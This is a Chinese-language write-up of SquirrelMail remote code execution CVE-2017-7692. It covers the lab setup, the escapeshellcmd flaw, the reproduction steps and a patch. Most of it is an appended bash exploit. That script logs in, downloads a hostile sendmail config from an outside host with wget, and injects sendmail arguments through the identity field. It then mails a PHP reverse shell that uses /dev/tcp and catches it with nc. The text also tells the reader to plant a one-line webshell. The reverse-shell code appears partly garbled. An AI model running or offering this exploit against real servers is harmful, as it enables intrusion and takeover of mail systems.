Squirrelmail远程代码执行漏洞（CVE-2017-7692）复现+修复方案

Squirrelmail远程代码执行漏洞(CVE-2017-7692)复现+修复方案。

一、实验环境

操作机：kali2.0

目标机：Centos 6.0

Squirrelmail版本：1.4.22-4el6

二、漏洞原理

1、有一个可以登录的邮箱账号和密码

2、Squirrelmai的MAT(因特网邮件传送代理)需要配置Sendmail

3、Squirrelmail的edit_identity配置为true(默认配置)

该漏洞的触发点位于Squirrelmail源码中的Deliver_SendMail.class.php文件中，在initStream函数中，使用了escapeshellcmd()来过滤用户的信息，然后将处理后的字符串传入popen函数(打开一个指向进程的管道)。

$this->sendmail_command = "$sendmail_path $this->sendmail_args -f$envelopefrom";

$stream = popen(escapeshellcmd($this->sendmail_command), "w");

但是由于escapeshellcmd()函数只对以下字符进行转义(在字符前面添加\):

&#;`|*?~^()[]{}$\, \x0A 和 \xFF

三、复现过程

1、解压文件使用poc.sh验证漏洞是否存在

2、根据脚本提示，输入用户名和密码 选择payload种类，设置IP和监听端口

3、等待10秒左右，可以看到，目标服务已经成功的反弹了cmdshell

4、接下来我们进入到Squirrelmail的源码目录下，留下一句话木马

四、漏洞修复

触发漏洞文件以及函数位置

/usr/share/squirrelmail/class/deliver/

initStream函数

将此代码 用以下代码替换

$this->sendmail_command = escapeshellcmd("$sendmail_path $this->sendmail_args -f").escapeshellarg($envelopefrom);

附 POC

#!/bin/bash

#

int='\033[94m

__ __ __ __ __

/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________

/ / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/

/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,

# Quick and messy PoC for SquirrelMail webmail application.

# It contains payloads for 2 vectors:

# * File Write

# * RCE

# It requires user credentials and that SquirrelMail uses

# Sendmail method as email delivery transport

#

#

# Full advisory URL:

# https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html

# Exploit URL:

# https://legalhackers.com/exploits/CVE-2017-7692/SquirrelMail_RCE_exploit.sh

#

# Tested on: # Ubuntu 16.04

# squirrelmail package version:

# 2:1.4.23~svn20120406-2ubuntu1.16.04.1

#

# Disclaimer:

# For testing purposes only

#

#

# -----------------------------------------------------------------

#

# Interested in vulns/exploitation?

# Stay tuned for my new project - ExploitBox

#

# .;lc'

# .,cdkkOOOko;.

# .,lxxkkkkOOOO000Ol'

# .':oxxxxxkkkkOOOO0000KK0x:'

{C}# .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.

# ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl.

# '';ldxxxxxdc,. ,oOXXXNNNXd;,.

# .ddc;,,:c;. ,c: .cxxc:;:ox:

# .dxxxxo, ., ,kMMM0:. ., .lxxxxx:

# .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx:

# .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx:

# .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx:

# .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx:

# .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx:

# .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx:

# .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx:

# .dxxxxxdl;. ., .. .;cdxxxxxx:

# .dxxxxxxxxxdc,. 'cdkkxxxxxxxx:

# .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,.

# .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.

# .':oxxxxxxxxx.ckkkkkkkkxl,.

# .,cdxxxxx.ckkkkkxc.

# .':odx.ckxl,.

# .,.'.

#

# https://ExploitBox.io

#

# https://twitter.com/Exploit_Box

#

# -----------------------------------------------------------------

sqspool="/var/spool/squirrelmail/attach/"

echo -e "$int"

#echo -e "\033[94m \nSquirrelMail - Remote Code Execution PoC Exploit (CVE-2017-7692) \n"

#echo -e "SquirrelMail_RCE_exploit.sh (ver. 1.0)\n"

#echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m\n\n"

# Base URL

if [ $# -ne 1 ]; then

echo -e "Usage: \n$0 SquirrelMail_URL"

echo -e "Example: \n$0 http://target/squirrelmail/ \n"

exit 2

fi

URL="$1"

# Log in

echo -e "\n[*] Enter SquirrelMail user credentials"

read -p "user: " squser

read -sp "pass: " sqpass

echo -e "\n\n[*] Logging in to SquirrelMail at $URL"

curl -s -D /tmp/sqdata -d"login_username=$squser&secretkey=$sqpass&js_autodetect_results=1&just_logged_in=1" $URL/src/redirect.php | grep -q incorrect

if [ $? -eq 0 ]; then

echo "Invalid creds"

exit 2

fi

sessid="`cat /tmp/sqdata | grep SQMSESS | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`"

keyid="`cat /tmp/sqdata | grep key | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`"

# Prepare Sendmail cnf

#

{C}# * The config will launch php via the following stanza:

#

# Mlocal, P=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,

# T=DNS/RFC822/X-Unix,

# A=php -- $u $h ${client_addr}

#

wget -q -O/tmp/smcnf-exp https://legalhackers.com/exploits/sendmail-exploit.cf

# Upload config

echo -e "\n\n[*] Uploading Sendmail config"

token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/compose.php?mailbox=INBOX&startMessage=1" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `"

attachid="`curl -H "Expect:" -s -b"SQMSESSID=$sessid; key=$keyid" -F"smtoken=$token" -F"send_to=$mail" -F"subject=attach" -F"body=test" -F"attachfile=@/tmp/smcnf-exp" -F"username=$squser" -F"attach=Add" $URL/src/compose.php | awk -F's:32' '{print $2}' | awk -F'"' '{print $2}' | tr -d '\n'`"

if [ ${#attachid} -lt 32 ]; then

echo "Something went wrong. Failed to upload the sendmail file."

exit 2

fi

# Create Sendmail cmd string according to selected payload

echo -e "\n\n[?] Select payload\n"

# SELECT PAYLOAD

echo "1 - File write (into /tmp/sqpoc)"

echo "2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)"

echo

read -p "[1-2] " pchoice

case $pchoice in

1) payload="$squser@localhost -oQ/tmp/ -X/tmp/sqpoc"

;;

2) payload="$squser@localhost -oQ/tmp/ -C$sqspool/$attachid"

;;

esac

if [ $pchoice -eq 2 ]; then

echo

read -p "Reverese shell IP: " reverse_ip

read -p "Reverese shell PORT: " reverse_port

fi

# Reverse shell code

phprevsh="

/dev/tcp/$reverse_ip/$reverse_port 0&1 & '\";

file_put_contents(\"/tmp/cmd\", 'export PATH=\"\$PATH\" ; export TERM=vt100 ;' . \$cmd);

system(\"/bin/bash /tmp/cmd ; rm -f /tmp/cmd\");

?>"

# Set sendmail params in user settings

echo -e "\n[*] Injecting Sendmail command parameters"

token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/options.php?optpage=personal" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `"

curl -s -b"SQMSESSID=$sessid; key=$keyid" -d "smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit" --data-urlencode "new_email_address=$payload" "$URL/src/options.php?optpage=personal" | grep -q 'Success' 2>/dev/null

if [ $? -ne 0 ]; then

echo "Failed to inject sendmail parameters"

exit 2

fi

# Send email which triggers the RCE vuln and runs phprevsh

echo -e "\n[*] Sending the email to trigger the vuln"

(sleep 2s && curl -s -D/tmp/sheaders -b"SQMSESSID=$sessid; key=$keyid" -d"smtoken=$token" -d"startMessage=1" -d"session=0" \

-d"send_to=$squser@localhost" -d"subject=poc" --data-urlencode "body=$phprevsh" -d"send=Send" -d"username=$squser" $URL/src/compose.php) &

if [ $pchoice -eq 2 ]; then

echo -e "\n[*] Waiting for shell on $reverse_ip port $reverse_port"

nc -vv -l -p $reverse_port

else

echo -e "\n[*] The test file should have been written at /tmp/sqpoc"

fi

grep -q "302 Found" /tmp/sheaders

if [ $? -eq 1 ]; then

echo "There was a problem with sending email"

exit 2

fi

# Done

echo -e "\n[*] All done. Exiting"